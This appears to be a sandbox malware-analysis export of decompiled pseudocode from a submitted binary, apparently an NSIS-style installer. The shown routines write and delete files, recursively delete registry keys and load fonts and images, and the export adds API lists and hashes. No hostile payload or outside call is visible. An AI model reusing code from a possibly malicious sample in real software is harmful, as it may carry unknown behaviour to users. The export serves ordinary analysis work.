                                                  				_t55 = _t26;
                                                  				 *(_t61 - 0x40) = _t26;
                                                  				if(E00405E83(_t26) == 0) {
                                                  					E00402DA6(0xffffffed);
                                                  				}
                                                  				E00406008(_t55);
                                                  				_t29 = E0040602D(_t55, 0x40000000, 2);
                                                  				 *(_t61 + 8) = _t29;
                                                  				if(_t29 != 0xffffffff) {
                                                  					 *(_t61 - 0x38) =  *(_t61 - 0x2c);
                                                  					if( *(_t61 - 0x28) != _t49) {
                                                  						_t37 =  *0x434f14;
                                                  						 *(_t61 - 0x44) = _t37;
                                                  						_t54 = GlobalAlloc(0x40, _t37);
                                                  						if(_t54 != _t49) {
                                                  							E004034E5(_t49);
                                                  							E004034CF(_t54,  *(_t61 - 0x44));
                                                  							_t59 = GlobalAlloc(0x40,  *(_t61 - 0x28));
                                                  							 *(_t61 - 0x10) = _t59;
                                                  							if(_t59 != _t49) {
                                                  								E004032B4( *(_t61 - 0x2c), _t49, _t59,  *(_t61 - 0x28));
                                                  								while( *_t59 != _t49) {
                                                  									_t60 = _t59 + 8;
                                                  									 *(_t61 - 0x3c) =  *_t59;
                                                  									E00405FE8( *((intOrPtr*)(_t59 + 4)) + _t54, _t60,  *_t59);
                                                  									_t59 = _t60 +  *(_t61 - 0x3c);
                                                  								}
                                                  								GlobalFree( *(_t61 - 0x10));
                                                  							}
                                                  							E004060DF( *(_t61 + 8), _t54,  *(_t61 - 0x44));
                                                  							GlobalFree(_t54);
                                                  							 *(_t61 - 0x38) =  *(_t61 - 0x38) | 0xffffffff;
                                                  						}
                                                  					}
                                                  					_t52 = E004032B4( *(_t61 - 0x38),  *(_t61 + 8), _t49, _t49);
                                                  					CloseHandle( *(_t61 + 8));
                                                  				}
                                                  				_t56 = 0xfffffff3;
                                                  				if(_t52 < _t49) {
                                                  					_t56 = 0xffffffef;
                                                  					DeleteFileW( *(_t61 - 0x40));
                                                  					 *((intOrPtr*)(_t61 - 4)) = 1;
                                                  				}
                                                  				_push(_t56);
                                                  				E00401423();
                                                  				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t61 - 4));
                                                  				return 0;
                                                  			}













                                                  0x00402950
                                                  0x00402952
                                                  0x00402957
                                                  0x0040295c
                                                  0x0040295f
                                                  0x00402969
                                                  0x0040296d
                                                  0x0040296d
                                                  0x00402973
                                                  0x00402980
                                                  0x00402988
                                                  0x0040298b
                                                  0x00402997
                                                  0x0040299a
                                                  0x004029a0
                                                  0x004029ae
                                                  0x004029b3
                                                  0x004029b7
                                                  0x004029ba
                                                  0x004029c3
                                                  0x004029cf
                                                  0x004029d3
                                                  0x004029d6
                                                  0x004029e0
                                                  0x004029ff
                                                  0x004029ec
                                                  0x004029f4
                                                  0x004029f7
                                                  0x004029fc
                                                  0x004029fc
                                                  0x00402a06
                                                  0x00402a06
                                                  0x00402a13
                                                  0x00402a19
                                                  0x00402a1f
                                                  0x00402a1f
                                                  0x004029b7
                                                  0x00402a33
                                                  0x00402a35
                                                  0x00402a35
                                                  0x00402a3f
                                                  0x00402a40
                                                  0x00402a44
                                                  0x00402a48
                                                  0x00402a4e
                                                  0x00402a4e
                                                  0x00402a55
                                                  0x004022f1
                                                  0x00402c2d
                                                  0x00402c39

                                                  APIs
                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
                                                  • GlobalFree.KERNEL32 ref: 00402A06
                                                  • GlobalFree.KERNEL32 ref: 00402A19
                                                  • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A35
                                                  • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.763702493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.763682035.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763734137.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763752126.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763863813.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763876966.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763912183.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763932066.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763966847.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_9u4xTDR5bG.jbxd
                                                  Similarity
                                                  • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                  • String ID:
                                                  • API String ID: 2667972263-0
                                                  • Opcode ID: 18333e3c7c5edca9258600c879c391e4e8cb8a080c4e0dd56f257e0fabcb70bb
                                                  • Instruction ID: 8fc1a79e9ee36ebd610a2d663d7387b5f1fea8f48d7bc9e01940cd119f3fb53c
                                                  • Opcode Fuzzy Hash: 18333e3c7c5edca9258600c879c391e4e8cb8a080c4e0dd56f257e0fabcb70bb
                                                  • Instruction Fuzzy Hash: 5831C271D00124BBCF216FA9CE49DDEBE79AF49364F14023AF450762E0CB794C429BA8
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 97%
                                                  			E73201979(signed int __edx, void* __eflags, void* _a8, void* _a16) {
                                                  				void* _v8;
                                                  				signed int _v12;
                                                  				signed int _v20;
                                                  				signed int _v24;
                                                  				char _v76;
                                                  				void _t45;
                                                  				signed int _t46;
                                                  				signed int _t47;
                                                  				signed int _t48;
                                                  				signed int _t57;
                                                  				signed int _t58;
                                                  				signed int _t59;
                                                  				signed int _t60;
                                                  				signed int _t61;
                                                  				void* _t67;
                                                  				void* _t68;
                                                  				void* _t69;
                                                  				void* _t70;
                                                  				void* _t71;
                                                  				signed int _t77;
                                                  				void* _t81;
                                                  				signed int _t83;
                                                  				signed int _t85;
                                                  				signed int _t87;
                                                  				signed int _t90;
                                                  				void* _t101;
                                                  
                                                  				_t85 = __edx;
                                                  				 *0x7320506c = _a8;
                                                  				_t77 = 0;
                                                  				 *0x73205070 = _a16;
                                                  				_v12 = 0;
                                                  				_v8 = E732012E3();
                                                  				_t90 = E732013B1(_t42);
                                                  				_t87 = _t85;
                                                  				_t81 = E732012E3();
                                                  				_a8 = _t81;
                                                  				_t45 =  *_t81;
                                                  				if(_t45 != 0x7e && _t45 != 0x21) {
                                                  					_a16 = E732012E3();
                                                  					_t77 = E732013B1(_t74);
                                                  					_v12 = _t85;
                                                  					GlobalFree(_a16);
                                                  					_t81 = _a8;
                                                  				}
                                                  				_t46 =  *_t81 & 0x0000ffff;
                                                  				_t101 = _t46 - 0x2f;
                                                  				if(_t101 > 0) {
                                                  					_t47 = _t46 - 0x3c;
                                                  					__eflags = _t47;
                                                  					if(_t47 == 0) {
                                                  						__eflags =  *((short*)(_t81 + 2)) - 0x3c;
                                                  						if( *((short*)(_t81 + 2)) != 0x3c) {
                                                  							__eflags = _t87 - _v12;
                                                  							if(__eflags > 0) {
                                                  								L56:
                                                  								_t48 = 0;
                                                  								__eflags = 0;
                                                  								L57:
                                                  								asm("cdq");
                                                  								L58:
                                                  								_t90 = _t48;
                                                  								_t87 = _t85;
                                                  								L59:
                                                  								E73201510(_t85, _t90, _t87,  &_v76);
                                                  								E73201312( &_v76);
                                                  								GlobalFree(_v8);
                                                  								return GlobalFree(_a8);
                                                  							}
                                                  							if(__eflags < 0) {
                                                  								L49:
                                                  								__eflags = 0;
                                                  								L50:
                                                  								_t48 = 1;
                                                  								goto L57;
                                                  							}
                                                  							__eflags = _t90 - _t77;
                                                  							if(_t90 < _t77) {
                                                  								goto L49;
                                                  							}
                                                  							goto L56;
                                                  						}
                                                  						_t85 = _t87;
                                                  						_t48 = E73203050(_t90, _t77, _t85);
                                                  						goto L58;
                                                  					}
                                                  					_t57 = _t47 - 1;
                                                  					__eflags = _t57;
                                                  					if(_t57 == 0) {
                                                  						__eflags = _t90 - _t77;
                                                  						if(_t90 != _t77) {
                                                  							goto L56;
                                                  						}
                                                  						__eflags = _t87 - _v12;
                                                  						if(_t87 != _v12) {
                                                  							goto L56;
                                                  						}
                                                  						goto L49;
                                                  					}
                                                  					_t58 = _t57 - 1;
                                                  					__eflags = _t58;
                                                  					if(_t58 == 0) {
                                                  						__eflags =  *((short*)(_t81 + 2)) - 0x3e;
                                                  						if( *((short*)(_t81 + 2)) != 0x3e) {
                                                  							__eflags = _t87 - _v12;
                                                  							if(__eflags < 0) {
                                                  								goto L56;
                                                  							}
                                                  							if(__eflags > 0) {
                                                  								goto L49;
                                                  							}
                                                  							__eflags = _t90 - _t77;
                                                  							if(_t90 <= _t77) {
                                                  								goto L56;
                                                  							}
                                                  							goto L49;
                                                  						}
                                                  						__eflags =  *((short*)(_t81 + 4)) - 0x3e;
                                                  						_t85 = _t87;
                                                  						_t59 = _t90;
                                                  						_t83 = _t77;
                                                  						if( *((short*)(_t81 + 4)) != 0x3e) {
                                                  							_t48 = E73203070(_t59, _t83, _t85);
                                                  						} else {
                                                  							_t48 = E732030A0(_t59, _t83, _t85);
                                                  						}
                                                  						goto L58;
                                                  					}
                                                  					_t60 = _t58 - 0x20;
                                                  					__eflags = _t60;
                                                  					if(_t60 == 0) {
                                                  						_t90 = _t90 ^ _t77;
                                                  						_t87 = _t87 ^ _v12;
                                                  						goto L59;
                                                  					}
                                                  					_t61 = _t60 - 0x1e;
                                                  					__eflags = _t61;
                                                  					if(_t61 == 0) {
                                                  						__eflags =  *((short*)(_t81 + 2)) - 0x7c;
                                                  						if( *((short*)(_t81 + 2)) != 0x7c) {
                                                  							_t90 = _t90 | _t77;
                                                  							_t87 = _t87 | _v12;
                                                  							goto L59;
                                                  						}
                                                  						__eflags = _t90 | _t87;
                                                  						if((_t90 | _t87) != 0) {
                                                  							goto L49;
                                                  						}
                                                  						__eflags = _t77 | _v12;
                                                  						if((_t77 | _v12) != 0) {
                                                  							goto L49;
                                                  						}
                                                  						goto L56;
                                                  					}
                                                  					__eflags = _t61 == 0;
                                                  					if(_t61 == 0) {
                                                  						_t90 =  !_t90;
                                                  						_t87 =  !_t87;
                                                  					}
                                                  					goto L59;
                                                  				}
                                                  				if(_t101 == 0) {
                                                  					L21:
                                                  					__eflags = _t77 | _v12;
                                                  					if((_t77 | _v12) != 0) {
                                                  						_v24 = E73202EE0(_t90, _t87, _t77, _v12);
                                                  						_v20 = _t85;
                                                  						_t48 = E73202F90(_t90, _t87, _t77, _v12);
                                                  						_t81 = _a8;
                                                  					} else {
                                                  						_v24 = _v24 & 0x00000000;
                                                  						_v20 = _v20 & 0x00000000;
                                                  						_t48 = _t90;
                                                  						_t85 = _t87;
                                                  					}
                                                  					__eflags =  *_t81 - 0x2f;
                                                  					if( *_t81 != 0x2f) {
                                                  						goto L58;
                                                  					} else {
                                                  						_t90 = _v24;
                                                  						_t87 = _v20;
                                                  						goto L59;
                                                  					}
                                                  				}
                                                  				_t67 = _t46 - 0x21;
                                                  				if(_t67 == 0) {
                                                  					_t48 = 0;
                                                  					__eflags = _t90 | _t87;
                                                  					if((_t90 | _t87) != 0) {
                                                  						goto L57;
                                                  					}
                                                  					goto L50;
                                                  				}
                                                  				_t68 = _t67 - 4;
                                                  				if(_t68 == 0) {
                                                  					goto L21;
                                                  				}
                                                  				_t69 = _t68 - 1;
                                                  				if(_t69 == 0) {
                                                  					__eflags =  *((short*)(_t81 + 2)) - 0x26;
                                                  					if( *((short*)(_t81 + 2)) != 0x26) {
                                                  						_t90 = _t90 & _t77;
                                                  						_t87 = _t87 & _v12;
                                                  						goto L59;
                                                  					}
                                                  					__eflags = _t90 | _t87;
                                                  					if((_t90 | _t87) == 0) {
                                                  						goto L56;
                                                  					}
                                                  					__eflags = _t77 | _v12;
                                                  					if((_t77 | _v12) == 0) {
                                                  						goto L56;
                                                  					}
                                                  					goto L49;
                                                  				}
                                                  				_t70 = _t69 - 4;
                                                  				if(_t70 == 0) {
                                                  					_t48 = E73202EA0(_t90, _t87, _t77, _v12);
                                                  					goto L58;
                                                  				} else {
                                                  					_t71 = _t70 - 1;
                                                  					if(_t71 == 0) {
                                                  						_t90 = _t90 + _t77;
                                                  						asm("adc edi, [ebp-0x8]");
                                                  					} else {
                                                  						if(_t71 == 0) {
                                                  							_t90 = _t90 - _t77;
                                                  							asm("sbb edi, [ebp-0x8]");
                                                  						}
                                                  					}
                                                  					goto L59;
                                                  				}
                                                  			}





























                                                  0x73201979
                                                  0x73201983
                                                  0x7320198c
                                                  0x7320198f
                                                  0x73201994
                                                  0x7320199d
                                                  0x732019a6
                                                  0x732019a8
                                                  0x732019af
                                                  0x732019b1
                                                  0x732019b4
                                                  0x732019bb
                                                  0x732019c9
                                                  0x732019d2
                                                  0x732019d7
                                                  0x732019da
                                                  0x732019e0
                                                  0x732019e0
                                                  0x732019e3
                                                  0x732019e6
                                                  0x732019e9
                                                  0x73201ab1
                                                  0x73201ab1
                                                  0x73201ab4
                                                  0x73201b34
                                                  0x73201b39
                                                  0x73201b48
                                                  0x73201b4b
                                                  0x73201b53
                                                  0x73201b53
                                                  0x73201b53
                                                  0x73201b55
                                                  0x73201b55
                                                  0x73201b56
                                                  0x73201b56
                                                  0x73201b58
                                                  0x73201b5a
                                                  0x73201b60
                                                  0x73201b69
                                                  0x73201b7a
                                                  0x73201b85
                                                  0x73201b85
                                                  0x73201b4d
                                                  0x73201b2f
                                                  0x73201b2f
                                                  0x73201b31
                                                  0x73201b31
                                                  0x00000000
                                                  0x73201b31
                                                  0x73201b4f
                                                  0x73201b51
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x73201b51
                                                  0x73201b3d
                                                  0x73201b41
                                                  0x00000000
                                                  0x73201b41
                                                  0x73201ab6
                                                  0x73201ab6
                                                  0x73201ab7
                                                  0x73201b26
                                                  0x73201b28
                                                  0x00000000
                                                  0x00000000
                                                  0x73201b2a
                                                  0x73201b2d
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x73201b2d
                                                  0x73201ab9
                                                  0x73201ab9
                                                  0x73201aba
                                                  0x73201af7
                                                  0x73201afc
                                                  0x73201b19
                                                  0x73201b1c
                                                  0x00000000
                                                  0x00000000
                                                  0x73201b1e
                                                  0x00000000
                                                  0x00000000
                                                  0x73201b20
                                                  0x73201b22
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x73201b24
                                                  0x73201afe
                                                  0x73201b03
                                                  0x73201b05
                                                  0x73201b07
                                                  0x73201b09
                                                  0x73201b12
                                                  0x73201b0b
                                                  0x73201b0b
                                                  0x73201b0b
                                                  0x00000000
                                                  0x73201b09
                                                  0x73201abc
                                                  0x73201abc
                                                  0x73201abf
                                                  0x73201af0
                                                  0x73201af2
                                                  0x00000000
                                                  0x73201af2
                                                  0x73201ac1
                                                  0x73201ac1
                                                  0x73201ac4
                                                  0x73201ad7
                                                  0x73201adc
                                                  0x73201ae9
                                                  0x73201aeb
                                                  0x00000000
                                                  0x73201aeb
                                                  0x73201ade
                                                  0x73201ae0
                                                  0x00000000
                                                  0x00000000
                                                  0x73201ae2
                                                  0x73201ae5
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x73201ae7
                                                  0x73201ac7
                                                  0x73201ac8
                                                  0x73201ace
                                                  0x73201ad0
                                                  0x73201ad0
                                                  0x00000000
                                                  0x73201ac8
                                                  0x732019ef
                                                  0x73201a68
                                                  0x73201a6a
                                                  0x73201a6d
                                                  0x73201a8b
                                                  0x73201a8e
                                                  0x73201a94
                                                  0x73201a99
                                                  0x73201a6f
                                                  0x73201a6f
                                                  0x73201a73
                                                  0x73201a77
                                                  0x73201a79
                                                  0x73201a79
                                                  0x73201a9c
                                                  0x73201aa0
                                                  0x00000000
                                                  0x73201aa6
                                                  0x73201aa6
                                                  0x73201aa9
                                                  0x00000000
                                                  0x73201aa9
                                                  0x73201aa0
                                                  0x732019f1
                                                  0x732019f4
                                                  0x73201a59
                                                  0x73201a5b
                                                  0x73201a5d
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x73201a63
                                                  0x732019f6
                                                  0x732019f9
                                                  0x00000000
                                                  0x00000000
                                                  0x732019fb
                                                  0x732019fc
                                                  0x73201a32
                                                  0x73201a37
                                                  0x73201a4f
                                                  0x73201a51
                                                  0x00000000
                                                  0x73201a51
                                                  0x73201a39
                                                  0x73201a3b
                                                  0x00000000
                                                  0x00000000
                                                  0x73201a41
                                                  0x73201a44
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x73201a4a
                                                  0x732019fe
                                                  0x73201a01
                                                  0x73201a28
                                                  0x00000000
                                                  0x73201a03
                                                  0x73201a03
                                                  0x73201a04
                                                  0x73201a18
                                                  0x73201a1a
                                                  0x73201a06
                                                  0x73201a08
                                                  0x73201a0e
                                                  0x73201a10
                                                  0x73201a10
                                                  0x73201a08
                                                  0x00000000
                                                  0x73201a04

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.764451858.0000000073201000.00000020.00000001.01000000.00000004.sdmp, Offset: 73200000, based on PE: true
                                                  • Associated: 00000000.00000002.764445556.0000000073200000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000000.00000002.764465355.0000000073204000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000000.00000002.764476426.0000000073206000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_73200000_9u4xTDR5bG.jbxd
                                                  Similarity
                                                  • API ID: FreeGlobal
                                                  • String ID:
                                                  • API String ID: 2979337801-0
                                                  • Opcode ID: a2488376e2ad28844052831d0487be3aea16f05f15da630b616e52c4974e3bd6
                                                  • Instruction ID: f0c583485d4a7d12a3774a3c89aacb32a55958471151a7684837e435e5ca5b7d
                                                  • Opcode Fuzzy Hash: a2488376e2ad28844052831d0487be3aea16f05f15da630b616e52c4974e3bd6
                                                  • Instruction Fuzzy Hash: 0751F53EF1011AABDB029FA485807AE7BBAEB44344F14815AD406B3294F7B5B9CDC791
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 48%
                                                  			E00402EA9(void* __eflags, void* _a4, short* _a8, signed int _a12) {
                                                  				void* _v8;
                                                  				int _v12;
                                                  				short _v536;
                                                  				void* _t27;
                                                  				signed int _t33;
                                                  				intOrPtr* _t35;
                                                  				signed int _t45;
                                                  				signed int _t46;
                                                  				signed int _t47;
                                                  
                                                  				_t46 = _a12;
                                                  				_t47 = _t46 & 0x00000300;
                                                  				_t45 = _t46 & 0x00000001;
                                                  				_t27 = E004063AA(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8);
                                                  				if(_t27 == 0) {
                                                  					if((_a12 & 0x00000002) == 0) {
                                                  						L3:
                                                  						_push(0x105);
                                                  						_push( &_v536);
                                                  						_push(0);
                                                  						while(RegEnumKeyW(_v8, ??, ??, ??) == 0) {
                                                  							__eflags = _t45;
                                                  							if(__eflags != 0) {
                                                  								L10:
                                                  								RegCloseKey(_v8);
                                                  								return 0x3eb;
                                                  							}
                                                  							_t33 = E00402EA9(__eflags, _v8,  &_v536, _a12);
                                                  							__eflags = _t33;
                                                  							if(_t33 != 0) {
                                                  								break;
                                                  							}
                                                  							_push(0x105);
                                                  							_push( &_v536);
                                                  							_push(_t45);
                                                  						}
                                                  						RegCloseKey(_v8);
                                                  						_t35 = E0040690A(3);
                                                  						if(_t35 != 0) {
                                                  							return  *_t35(_a4, _a8, _t47, 0);
                                                  						}
                                                  						return RegDeleteKeyW(_a4, _a8);
                                                  					}
                                                  					_v12 = 0;
                                                  					if(RegEnumValueW(_v8, 0,  &_v536,  &_v12, 0, 0, 0, 0) != 0x103) {
                                                  						goto L10;
                                                  					}
                                                  					goto L3;
                                                  				}
                                                  				return _t27;
                                                  			}












                                                  0x00402eb4
                                                  0x00402ebd
                                                  0x00402ec6
                                                  0x00402ed2
                                                  0x00402edb
                                                  0x00402ee5
                                                  0x00402f0a
                                                  0x00402f10
                                                  0x00402f15
                                                  0x00402f16
                                                  0x00402f46
                                                  0x00402f1f
                                                  0x00402f21
                                                  0x00402f71
                                                  0x00402f74
                                                  0x00000000
                                                  0x00402f7a
                                                  0x00402f30
                                                  0x00402f35
                                                  0x00402f37
                                                  0x00000000
                                                  0x00000000
                                                  0x00402f3f
                                                  0x00402f44
                                                  0x00402f45
                                                  0x00402f45
                                                  0x00402f52
                                                  0x00402f5a
                                                  0x00402f61
                                                  0x00000000
                                                  0x00402f8a
                                                  0x00000000
                                                  0x00402f69
                                                  0x00402ef5
                                                  0x00402f08
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00402f08
                                                  0x00402f90

                                                  APIs
                                                  • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402EFD
                                                  • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
                                                  • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F52
                                                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
                                                  • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F74
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.763702493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.763682035.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763734137.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763752126.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763863813.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763876966.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763912183.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763932066.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763966847.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_9u4xTDR5bG.jbxd
                                                  Similarity
                                                  • API ID: CloseEnum$DeleteValue
                                                  • String ID:
                                                  • API String ID: 1354259210-0
                                                  • Opcode ID: 78d35a7524f1d2205fa0e87ab22fa6bfb41dfe8b1a27fd9ec563711b6eb4cb1f
                                                  • Instruction ID: ca6229ec891c5908b4c2d3bab14ae3db7b9396451d72a40731f1c02386a45f13
                                                  • Opcode Fuzzy Hash: 78d35a7524f1d2205fa0e87ab22fa6bfb41dfe8b1a27fd9ec563711b6eb4cb1f
                                                  • Instruction Fuzzy Hash: DA215A7150010ABBEF119F90CE89EEF7B7DEB50384F100076F909B21A0D7B49E54AA68
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 77%
                                                  			E00401D81(void* __ebx, void* __edx) {
                                                  				struct HWND__* _t30;
                                                  				WCHAR* _t38;
                                                  				void* _t48;
                                                  				void* _t53;
                                                  				signed int _t55;
                                                  				signed int _t60;
                                                  				long _t63;
                                                  				void* _t65;
                                                  
                                                  				_t53 = __ebx;
                                                  				if(( *(_t65 - 0x23) & 0x00000001) == 0) {
                                                  					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x28));
                                                  				} else {
                                                  					E00402D84(2);
                                                  					 *((intOrPtr*)(__ebp - 0x10)) = __edx;
                                                  				}
                                                  				_t55 =  *(_t65 - 0x24);
                                                  				 *(_t65 + 8) = _t30;
                                                  				_t60 = _t55 & 0x00000004;
                                                  				 *(_t65 - 0x38) = _t55 & 0x00000003;
                                                  				 *(_t65 - 0x18) = _t55 >> 0x1f;
                                                  				 *(_t65 - 0x40) = _t55 >> 0x0000001e & 0x00000001;
                                                  				if((_t55 & 0x00010000) == 0) {
                                                  					_t38 =  *(_t65 - 0x2c) & 0x0000ffff;
                                                  				} else {
                                                  					_t38 = E00402DA6(0x11);
                                                  				}
                                                  				 *(_t65 - 0x44) = _t38;
                                                  				GetClientRect( *(_t65 + 8), _t65 - 0x60);
                                                  				asm("sbb esi, esi");
                                                  				_t63 = LoadImageW( ~_t60 &  *0x434f00,  *(_t65 - 0x44),  *(_t65 - 0x38),  *(_t65 - 0x58) *  *(_t65 - 0x18),  *(_t65 - 0x54) *  *(_t65 - 0x40),  *(_t65 - 0x24) & 0x0000fef0);
                                                  				_t48 = SendMessageW( *(_t65 + 8), 0x172,  *(_t65 - 0x38), _t63);
                                                  				if(_t48 != _t53 &&  *(_t65 - 0x38) == _t53) {
                                                  					DeleteObject(_t48);
                                                  				}
                                                  				if( *((intOrPtr*)(_t65 - 0x30)) >= _t53) {
                                                  					_push(_t63);
                                                  					E00406484();
                                                  				}
                                                  				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t65 - 4));
                                                  				return 0;
                                                  			}











                                                  0x00401d81
                                                  0x00401d85
                                                  0x00401d9a
                                                  0x00401d87
                                                  0x00401d89
                                                  0x00401d8f
                                                  0x00401d8f
                                                  0x00401da0
                                                  0x00401da3
                                                  0x00401dad
                                                  0x00401db0
                                                  0x00401db8
                                                  0x00401dc9
                                                  0x00401dcc
                                                  0x00401dd7
                                                  0x00401dce
                                                  0x00401dd0
                                                  0x00401dd0
                                                  0x00401ddb
                                                  0x00401de5
                                                  0x00401e0c
                                                  0x00401e1b
                                                  0x00401e29
                                                  0x00401e31
                                                  0x00401e39
                                                  0x00401e39
                                                  0x00401e42
                                                  0x00401e48
                                                  0x00402ba4
                                                  0x00402ba4
                                                  0x00402c2d
                                                  0x00402c39

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.763702493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.763682035.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763734137.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763752126.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763863813.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763876966.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763912183.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763932066.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763966847.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_9u4xTDR5bG.jbxd
                                                  Similarity
                                                  • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                  • String ID:
                                                  • API String ID: 1849352358-0
                                                  • Opcode ID: 0d14a93a4aa2f7ddc0f91d11ffebc05af74b5a93feb44974f4da7284e64bbe2b
                                                  • Instruction ID: b69f8f45c5cbb28dd5603d9b1d667d2ce3d3910c133b75fee4ecc707c572ca23
                                                  • Opcode Fuzzy Hash: 0d14a93a4aa2f7ddc0f91d11ffebc05af74b5a93feb44974f4da7284e64bbe2b
                                                  • Instruction Fuzzy Hash: 3321F672904119AFCB05DBA4DE45AEEBBB5EF08314F14003AFA45F62A0DB389951DB98
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 73%
                                                  			E00401E4E(intOrPtr __edx) {
                                                  				void* __edi;
                                                  				int _t9;
                                                  				signed char _t15;
                                                  				struct HFONT__* _t18;
                                                  				intOrPtr _t30;
                                                  				void* _t31;
                                                  				struct HDC__* _t33;
                                                  				void* _t35;
                                                  
                                                  				_t30 = __edx;
                                                  				_t33 = GetDC( *(_t35 - 8));
                                                  				_t9 = E00402D84(2);
                                                  				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
                                                  				0x40cdf0->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t33, 0x5a), 0x48));
                                                  				ReleaseDC( *(_t35 - 8), _t33);
                                                  				 *0x40ce00 = E00402D84(3);
                                                  				_t15 =  *((intOrPtr*)(_t35 - 0x20));
                                                  				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
                                                  				 *0x40ce07 = 1;
                                                  				 *0x40ce04 = _t15 & 0x00000001;
                                                  				 *0x40ce05 = _t15 & 0x00000002;
                                                  				 *0x40ce06 = _t15 & 0x00000004;
                                                  				E0040657A(_t9, _t31, _t33, 0x40ce0c,  *((intOrPtr*)(_t35 - 0x2c)));
                                                  				_t18 = CreateFontIndirectW(0x40cdf0);
                                                  				_push(_t18);
                                                  				_push(_t31);
                                                  				E00406484();
                                                  				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t35 - 4));
                                                  				return 0;
                                                  			}











                                                  0x00401e4e
                                                  0x00401e59
                                                  0x00401e5b
                                                  0x00401e68
                                                  0x00401e7f
                                                  0x00401e84
                                                  0x00401e91
                                                  0x00401e96
                                                  0x00401e9a
